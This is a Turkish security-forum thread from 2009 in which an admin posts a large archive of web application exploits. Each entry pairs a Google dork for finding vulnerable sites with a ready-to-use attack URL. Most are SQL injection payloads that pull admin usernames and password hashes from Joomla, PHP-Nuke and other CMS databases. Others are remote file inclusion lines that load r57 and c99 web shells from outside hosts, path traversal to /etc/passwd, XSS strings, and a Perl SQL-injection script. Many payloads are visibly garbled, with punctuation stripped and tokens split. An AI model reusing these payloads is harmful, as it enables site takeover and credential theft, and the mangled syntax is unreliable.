forumlar
Anasayfa Haftalık İstatistikler Kimler Online Bugünkü Mesajlar GOLD üYE OL Arkadaş listemi göster Profilim Html Renk Kodları
Geri git   Dusler Forum, Forumlar > ~~ BiLGiSAYAR Forum ForumLarı ~~ > Güvenlik Forum , Güvenlik Forumları
Sayfaya güncelle ÇeşitLi WebSite Açıkları Arşivim
Kayıt ol YardımPageRank Sorgulama Üye Listesi Ajanda Bütün Forumları okunmuş kabul et

Güvenlik Forum , Güvenlik Forumları Güvenlik Konusunda Merak Ettikleriniz..

   

Cevapla  Yeni Konu aç
 
Seçenekler Stil
Alt 01-10-2009, 04:13 PM   #1
endLesS
|~|~ ADMiN ~|~|
 
endLesS - ait Kullanıcı Resmi (Avatar)
 
DF İzmir Şubesi
Üyelik tarihi: May 2009
Kan Grubu: 0 RH (+) Cinsiyet:
Mesajlar: 24.411
Konu Sayısı: 4216
Seviye: 85 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 3167 / 3167
Güç: 7663 / 7663
Deneyim: 46%
REP Puanı : 70
REP Seviyesi : endLesS will become famous soon enough
Thumbs up ÇeşitLi WebSite Açıkları Arşivim
         
PHP-Nuke (Kose_Yazilari) Açığı

Google Arama : ''name Kose_Yazilari op viewarticle artid''
Google arama : ''name Kose_Yazilari op printpage artid''

Site sonuna : modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F01aidpwd45%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors

modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0pwdaid3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors



WorldTube Açığı

Google Arama: "inurl:/plugins/wordtube"

Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?

Not: Html'den sonrasına kendi shell adresiniz gerekli.



Joomla" Component EventList Açığı

Google Arama : intext: Event List 0.8 Alpha by schlu.net

Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%2000concat(char(117 1151011141109710910158)usernamechar(321 129711511511911111410058)password)456 789000444555077709990000000%20fro m%20jos_users/*



Powered By 6rbScript Açığı

Google Arama : Powered by 6rbScript

Site Sonuna

PWD

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

USER

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]



Com-Actualite Açığı

Google Arama : allinurl: "com_actualite"

Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201concat(usernamechar(32)pa ssword)3456789%20from%20jos_users/*



Com-Mtree Açığı

Google Arama : inurl:"/com_mtree/"

Site sonuna : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=



Webring Component (component_dir) Açığı

Google Arama: inurl:com_webring

Site Sonuna : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?



Com-Lmo Açığı

Google Arama : "com_lmo"

Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";



Com-PonyGallery Açığı

Google Arama : inurl:"index.php?option=com_ponygallery"

Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%20123concat(c har(1171151011141109710910158)usernamech ar(321129711511511911111410058)password) 500%20from%20jos_users/*



Com-NeoRecruit Açığı

Google Arama : inurl:index.php?option=com_NeoRecruit

Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201concat(char(117 1151011141109710910158)usernamechar(3211 29711511511911111410058)password)3456 781112223334440005556667778881234 50%20from%20jos_users/*



Com-Rsfiles Açığı

Google Arama : inurl:"/index.php?option=com_rsfiles"

Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=



Com-Nicetalk Açığı

Google Arama : inurl:index.php?option=com_nicetalk

Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%20123456780999concat (char(1171151011141109710910158)username char(321129711511511911111410058)passwor d)777666555444333222111%20from%20jos_users/*



Com-Joomlaradiov5

Google Arama : inurl:"com_joomlaradiov5"

Site Sonuna : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]



Com-JoomlaFlashFun Açığı

Google Arama : "com_joomlaflashfun"

Site Sonuna : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][attacker]



Carousel Flash Image Açığı

Google Arama : inurl:"com_jjgallery

Site Sonuna : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?



Com-Mambads Açığı

Google Arama : inurl:com_mambads

Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/12345concat(char(117115101114110971091 0158)usernamechar(3211297115115119111114 10058)password)78910111213141516171 81920212223%20from%20mos_users/*





Kanbolat:

WebLosning Açığı

Dork : allinurl: "index2.php?id"

Exploide

1 [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

2 [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

3 [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

4 [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Powered By: MFH v1 Açığı

Dork: "Powered by: MFH v1"

Exploitation options:

ADIM 1: /members.php?folders=1&fid=-1+union+all+select+12concat(user0x3aemail)pas s5678+from+users+-- to get the users

ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+12adminpass5678+from+set ting+-- to get the admin info

ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+12userpass5678+from+serv er+-- to get the ftp server info (if its configured)




W.G.C.C Açığı

Google Dork : "Web Group Communication Center"

Exploit:
XSS:
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C




Powered By Zomplog Açığı

Dork: "powered by zomplog"

Exploit:
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Xcart Rfi Açığı

Google dork : "X-CART. Powerful PHP shopping cart software"

Exploit

site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?




Plugin-Class tabanlı Sistemlerde Açık

Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=

Exploide:

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"

Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz...




Powered By Linkspile Açığı

Dork : Powered By linkspile

Exploit :

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]



The Realestate Script Açığı

Dork : inurl:dpage.php?docID

Exploit : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Calogic Calendars V1.2.2 Açığı

Dork : "CaLogic Calendars V1.2.2"

POC : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][SCRIPT_PATH]/userreg.php?langsel={SQL}

Example : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname0x3apw) FROM clc_user_reg where uid=CHAR(49)--




Powered By PHPizabi Açığı

Dork: "Powered by PHPizabi v0.848b C1 HFP1"

Exploit:

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

Example:

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




AJ Auction 6.2.1 Açığı

DORK: inurl:"classifide_ad.php"

Exploide:

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Powered By Novus Açığı

Dork: "Powered by Novus"

İnformation server:

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]))
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...])
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Com-Mgm Açığı

Google Dork: inurl:"com_mgm"

Exploide:

administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Com-Loudmounth Açığı

Dork: inurl:com_loudmounth

Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Com-Thopper Açığı

Google Dork : inurl:com_thopper veya inurlhp?option=com_thopper

Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?




Com-Bsq-Sitestats Açığı

Google Dork: inurl:com_bsq_sitestats

Exploid:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?




Com-PeopleBook Açığı

Google Dork: inurl:com_peoplebook

Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Joomla Component AstatsPRO Açığı

Dork: allinurl: "com_astatspro"

Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0concat(username0x3apassword0x3ausertype)con cat(username0x3apassword0x3ausertype)/**/from/**/jos_users/*




WorkingOnWeb 2.0.1400 Açığı

Dork: Powered by WorkingOnWeb 2.0.1400

Exploide:

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Powered by cpDynaLinks Açığı

Dork: Powered by cpDynaLinks

connecting in [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039

use strict;
use LWP::UserAgent;

my $host = $ARGV[0];

if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: http://host.com/cpDynaLinks\n";
exit(1);
}

print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/123concat(0x5f5f5f5f0x5b215d20757365723a20adm in_username0x20205b215d20706173733a20admin_passw ord0x5f5f5f5f)56789999/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
Gelen sayfada "kaynağı görüntüle"yiniz. İlk satırlarda admin nick vs md5 ler yer alır




Maplab-2.2 Açığı

Dorks:

index.of /maplab-2.2
intitleapLab
index.of /maplab-2.2
index.of /maplab/

Exploit:
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][EvilScript]




Maplab-2.2 Açığı

Dorks:

index.of /maplab-2.2
intitleapLab
index.of /maplab-2.2
index.of /maplab/

Exploit:
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][EvilScript]




Admidio 1.4.8 RFI Açığı

Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




ezContents CMS Açığı

Dork: "ezContents CMS Version 2.0.0"

Exploits:

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][patch]/showdetails.php?contentname="'/**/union/**/select/**/1234567891011121314151617181920 2122232425262728concat(login0x3auserpas swordchar(5858)authoremail)30/**/from/**/authors/**/where/**/authorid=1/*

Exploits 2:

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][patch]/printer.php?article='/**/union/**/select/**/1234567891011121314151617181920 2122232425262728concat(login0x3auserpas swordchar(5858)authoremail)30/**/from/**/authors/**/where/**/authorid=1/*




SoftbizScripts Açığı

Dork: "inurl:Powered by SoftbizScripts" veya "Subscribe Newsletter"

Exploit: [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] union select 12concat(sb_id0x3asb_admin_name0x3asb_pwd)4 5678901234567890123456789 0123456789 from sb_host_admin--

Script Açığıdır...




ProfileCMS v1.0 Açığı

Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"

Exploit: [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Com-Rsgallery Açığı

Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery

Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201234concat(username0x3a password)67891011%20from%20mos_users--

Admin nick vs hashları verir. Joomlada bulunan bir açıktır

Admin girişi: /administrator/




Powered By Power Editor Açığı

Dork: Powered By Power Editor

Exploid : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][base64 password]&te=[local_file]&dir=[local_dir] examp: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..




Kmitam Açığı

Dork: "inurl:/kmitam/"

Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil?

Yöntemi: Shell




BackLinkSpider Açığı

Dork: "Powered By BackLinkSpider" veya "inurl:backlinkspider.php"

Exploit: [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][backlinkspider_page_name].php?cat_id=[SQL]

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][backlinkspider_page_name].php?cat_id=-1%20union%20select%2012345678901version ()34567890/*



Kanbolat:

Kmita Tell Friend Açığı

Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"

Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?

Yöntemi: Shell
Panele yönlendirir.




View-FAQ Açığı

Dork: Google : "allinurl:viewfaqs.php?cat="

Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id0x3ausername0x3a password)%20from PHPAUCTIONXL_adminusers--






Adresimiz : w w w. d u s l e r f o r u m. o r g
____________________
'











Aynaya Bak Sonra Beni eLeştir
Burda ŞekiL Yapma Kendini geLiştir




ChaKMa_$eiTaN
endLesS isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 01-10-2009, 04:13 PM   #2
endLesS
|~|~ ADMiN ~|~|
 
endLesS - ait Kullanıcı Resmi (Avatar)
 
DF İzmir Şubesi
Üyelik tarihi: May 2009
Kan Grubu: 0 RH (+) Cinsiyet:
Mesajlar: 24.411
Konu Sayısı: 4216
Seviye: 85 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 3167 / 3167
Güç: 7663 / 7663
Deneyim: 46%
REP Puanı : 70
REP Seviyesi : endLesS will become famous soon enough
Standart ---> ÇeşitLi WebSite Açıkları Arşivim
Days-Booking Açığı

Dork: "allinurl:index.php?user=daysbooking"

Exploid: index.php?pid=-1%20union%20select%201concat(id0x3auser0x3apa ssword0x3aaccess0x3aemail)3456789012 3456789012345678901234567 89012%20from%20admin--&user=det




Pn-Encyclopedia Açığı

Dork: allinurl:index.php?module=pnEncyclopedia

Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 123456version()891011--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 123456load_file




Gamma Scripts Açığı

Dork : "BlogMe PHP created by Gamma Scripts"

Exploit : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][BlogMe_path]/comments.php?id=-1 UNION SELECT 123456aes_decrypt(aes_encrypt(user()0x71)0 x71)--

veya

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][BlogMe_path]/comments.php?id=-1 UNION SELECT 12unhex(hex(database()))4567--




ASPapp KnowledgeBase Açığı

Dork 1 - content_by_cat.asp?contentid ''catid''

Dork 2 - content_by_cat.asp? ''catid''

exploit-

content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0nullpassword3accessleve l5null7nulluser_name+from+users

content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0nullpassword3accessleve l5null78user_name+from+users




EmagiC CMS.Net v4.0 Açığı

Dork : inurl:emc.asp?pageid=

Exploit:

emc.asp?pageId=1' UNION SELECT TOP 1 convert(int password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--




vlBook 1.21 Script Açığı

Script Download : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

DORK : "Powered by vlBook 1.21"

XSS Address : http://example/?l=" **********alert('xss')</script>

LFI Address : [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][FILE NAME]%00




PHP-Nuke Siir Açığı

DORK 1 : allinurl:"modules.php?name"print

DORK 2 : allinurl:"modules.php?name="Hikaye"
DORK 3: allinurl:"modules.php?name="Fikralar"
DORK 4: allinurl:"modules.php?name="bilgi"

EXPLOIT :

print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0aid0x3apwd4/**/from+nuke_authors/*where%20admin%201%200%202




Com_JoomlaFlashfun Açığı

Dork: "com_joomlaflashfun"

Example:
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][xxxx]




Powered By The Black Lily 2007 Açığı

Dork : "Powered By The Black Lily 2007"

EXPLOIT:
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

veya

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




JUser Joomla Component 1.0.14 Açığı

Dork: inurl:com_juser

Exploit

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...][evilcode]




Rmsoft GS 2.0 Açığı

Dork: intext:Powered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.php

Exploit:

modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/11concat(database()0x202D20user())111101 0101100000110001110100/*




Com-Na-Xxx Açığı

DORK 1 : allinurl:"com_na_content"

DORK 2 : allinurl:"com_na_bible"

DORK 3 : allinurl:"com_na_events"

DORK 4 : allinurl:"com_na_content"

DORK 5 : allinurl:"com_na_feedback"

DORK 6 : allinurl:"com_na_mydocs"

DORK 7 : allinurl:"com_na_churchmap"

DORK 8 : allinurl:"com_na_bibleinfo"

DORK 9 : allinurl:"com_na_dbs"

DORK 10 : allinurl:"com_na_udm"

DORK 11 : allinurl:"com_na_qforms"

DORK 12 : allinurl:"com_na_gallery2"

DORK 13 : allinurl:"com_na_publicrss"

DORK 14 : allinurl:"index.php?kwd"

EXPLOİT:

index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username0x3apassword)00usernamepasswo rd%2C0%2C0%2C0/**/from/**/mos_users/*




Com-Comments Açığı

Dork: "Review Script" "Phil Taylor"

Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0999999concat(username0x3aPASSW ORD)000000+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1




Portfolio Manager 1.0 Açığı

Dork: inurl:"index.php?option=com_portfolio"

Exploit:

[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Com-Astatspro Açığı

Dork: allinurl: "com_astatspro"

PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0concat(username0x3apassword0x3ausertype)con cat(username0x3apassword0x3ausertype)/**/from/**/jos_users/*

Gelen sayfada sağ tıkla kaynağı görüntüle.

<H1>302 Moved</H1>
The ************************ has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.

Bu bölümde md5 saklıdır.




Modified By Fully Açığı

DORK : allinurl :kb.php?mode=article&k
DORK : "Powered by phpBB © 2001 2006 phpBB Group" veya "Modified by Fully Modded phpBB © 2002 2006"

EXPLOIT :

kb.php?mode=article&k=-1+union+select+11concat(user_idchar(58)usernam echar(58)user_password)45678910111213+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1




Easy-Clanpage v2.2 Açığı

Dork: "Easy-Clanpage v2.2"

Example -1/**/union/**/select/**/12concat(username0x3apassword)4567/**/from/**/ecp_user/**/where/**/userid=1/*




BM Classifieds Açığı

Dork 1 : ''showad.php?listingid=''

Dork 2 : ''pfriendly.php?ad=''

EXPLOIT:

showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username0x3aemail)password2/**/from/**/users/*

pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 1concat(username0x3aemail)password45678 910111213141516171819202122232425 2627%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F




Porar WebBoart Açığı

DorK : '' webboard question.asp QID''

EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200null2 usernamepassword5password789null%20+%20fro m%20+%20+%20administrator%20';';




Com-Noticias Açığı

DorK : ''com_noticias''

EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0concat##(username0x3apassword0x3aemail)23 45/**/%20from/**/%20jos_users/*




ASPapp -links.asp Açığı

dork - ''links.asp?CatId''

links.asp?CatId=-99999%20UNION%20SELECT%20nullaccesslevelnullnul luser_name%205%20passwordnull%20FROM%20Users

admin login-
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]




Modules-Viso Açığı

DORKS 1 : allinurl :"modules/viso"

EXPLOIT 1 :

modules/viso/index.php?kid=-9999999/**/union/**/select/**/00x3auname0x3a0x3a0x3apass/**/from/**/exv2_users/*where%20exv2_admin%201

EXPLOIT 2 :

modules/viso/index.php?kid=-9999999/**/union/**/select/**/00x3auname0x3a0x3a0x3apasspass/**/from/**/exv2_users/*where%20exv2_admin%201




Bookmarkx Script Açığı

DorK 1 : "2007 BookmarkX script"

DORK 2 : Powered by GengoliaWebStudio

DORK 3 : allinurl :"index.php?menu=showtopic"

EXPLOIT :

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/12concat(auser0x3aapass)456/**/FROM/**/admin/*%20admin=1

veya;

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/12concat(auser0x3aapass)4567/**/FROM/**/admin/*%20admin=1




Com-Profiler Açığı

DORK: allinurl:com_comprofiler

Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/01)11)/**/</**/Char(97)/*




Com-Jpad Açığı

DORK: allinurl:com_jpad

Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 123concat_ws(0x3ausernamepassword)5678 from jos_users--




PostSchedule Açığı

Google Dork : "PostSchedule ver 1"

Exploid:

index.php?module=PostSchedule&view=event&eid=-1')+union+select+012345678concat(pn_uname char(58)pn_pass)10111213/**/from/**/nuke_users/**/where/**/pn_uid=2/*




joomla SQL Injection(Com-Jokes) Açığı

DorK : allinurl: "com_jokes"

EXPLOIT :

index.php?option=com_jokes&Itemid=bgh7&func=CatVie w&cat=-776655/**/union/**/select/**/0123username5password78/**/from/**/mos_users/*




Com_Estateagent Açığı

Dork : allinurl: "com_estateagent"

EXPLOIT :

index.php?option=com_estateagent&Itemid=bgh7&func= showObject&info=contact&objid=-9999/**/union/**/select/**/usernamepassword/**/from/**/mos_users/*&results=xxxx




Com-Fq Açığı

DorK: allinurl: "com_fq"

EXPLOIT :

index.php?option=com_fq&Itemid=S@BUN&listid=999999 9/**/union/**/select/**/namepassword/**/from/**/mos_users/*




Com-Mamml Açığı

DorK : allinurl: "com_mamml"

EXPLOIT :

index.php?option=com_mamml&listid=9999999/**/union/**/select/**/namepassword/**/from/**/mos_users/*




joomla SQL Injection(com_gallery) Açığı

DORK : allinurl: com_gallery "func"

EXPLOIT 1 :

index.php?option=com_gallery&Itemid=0&func=detail& id=-99999/**/union/**/select/**/00password00000000000000000use rname/**/from/**/mos_users/*

EXPLOİT 2 :

index.php?option=com_gallery&Itemid=0&func=detail& id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users




Joomla Component Profiler Açığı

DORK: allinurl:com_comprofiler

Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/01)11)/**/</**/Char(97)/*




Joomla Component Filiale SQL Injection Açığı

DORK : inurl:com_filiale

Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1password34username678910 11+from+jos_users




FlippingBook Açığı

DORK : inurl:com_flippingbook

Exploit :

/index.php?option=com_flippingbook&Itemid=28&book_i d=null/**/union/**/select/**/nullconcat(username0x3epassword)nullnullnull nullnullnullnullnullnullnullnullnullnull nullnullnullnullnullnullnullnullnullnull nullnullnullnullnullnullnullnullnullnull/**/from/**/jos_users/*




Pagenum Açığı

DORK : allinurl: " list.php?pagenum"

EXPLOIT

list.php?pagenum=0&categoryid=1+union+select+1112 22concat_ws(char(58)loginpassword)444+from+adm in_login/*




Modules-Tutorials Açığı

DORK 1 : allinurl :"/modules/tutorials/"

DORK 2 : allinurl :"/modules/tutorials/"tid

EXPLOIT 1 :

modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname0x3apass)1concat(uname0x3apass) 345/**/from/**/xoops_users/*

EXPLOIT 2 :

modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/01concat(uname0x3apass)3/**/from/**/xoops_users/*




Modules-Glossaires Açığı

DORK : allinurl: "modules/glossaires"

EXPLOIT :

modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000passunamepass/**/from/**/xoops_users/*where%20terme




OsCommerce SQL Injection Açığı

Google Dork: inurl:"customer_testimonials.php"

Exploit:
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

Not: Aynı zamanda yönetici değilde bütün üyelerin md5 lerini karşınıza dizer.




Tr Script News v2.1 Açığı

Google Dork: inurl:news.php?mode=voir

Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1234concat_ws(0x3apseudopassemail)67/**/from/**/tr_user_news/*

Admin girişi = /admin



Kanbolat:

Com-Alberghi Açığı

DORK 1 : allinurl: "" detail

DORK 2 : allinurl: "com_alberghi"

EXPLOIT 1 :

index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/000x3a0000000011121111111122 22222222333333333333333con cat(username0x3apassword)/**/from/**/jos_users/*

EXPLOIT 2 :

index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/000x3a0000000011121111111122 2222222233333333333333333 333concat(username0x3apassword)/**/from/**/jos_users/*




Powered By Joovideo V1.0 Açığı

DORK 1 : allinurl: "com_joovideo" detail

DORK 2 : allinurl: "com_joovideo"

DORK 3 : Powered by joovideo V1.0

EXPLOIT :

